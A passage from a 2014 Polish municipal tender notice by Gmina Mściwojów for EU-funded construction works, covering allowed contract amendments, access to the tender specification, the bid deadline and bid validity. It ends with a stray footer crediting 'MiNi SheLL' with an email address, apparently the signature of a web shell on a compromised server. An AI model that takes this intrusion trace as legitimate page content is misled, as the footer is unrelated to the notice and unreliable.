i) zmianą przepisów prawa, mających wpływ na termin wykonania robót lub sposób prowadzenia robót,
Termin zostanie wydłużony tylko o czas trwania przeszkody. Zmiana terminu realizacji nie będzie powodowała zwiększenia wynagrodzenia Wykonawcy,
2) Zmiany osobowe:
a) zmiany osób realizujących zamówienie, pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ;
b) zmiany osób reprezentujących w przypadku zmian organizacyjnych;
c) zmiana Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy; zmiana jest możliwa tylko w przypadku, gdy nowy podwykonawca posiada tożsamą wiedzę i doświadczenie zawodowe, potencjał techniczny oraz osoby zdolne do wykonania Zamówienia a także jest w sytuacji ekonomiczniej i finansowej, nie gorszej niż dotychczasowy podwykonawca,
d) Zmiana kierownika budowy na wniosek Zamawiającego, jeżeli uzna, że nie wykonuje on należycie swoich obowiązków. Wykonawca zobowiązany jest wówczas dokonać zmiany kierownika budowy (przy zachowaniu wymagań określonych w SIWZ) w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez Zamawiającego.
3) Inne zmiany:
a) w każdym przypadku gdy zmiana jest korzystna dla Zamawiającego,
b) Zamawiający zastrzega sobie prawo do wprowadzenia zmian w harmonogramie rzeczowo-finansowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.msciwojow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mściwojów, Mściwojów 43, 59-407 Mściwojów pok. nr 12, cena 45,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 09:45, miejsce: Urząd Gminy Mściwojów, Mściwojów 43, 59-407 Mściwojów pok. nr 23 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com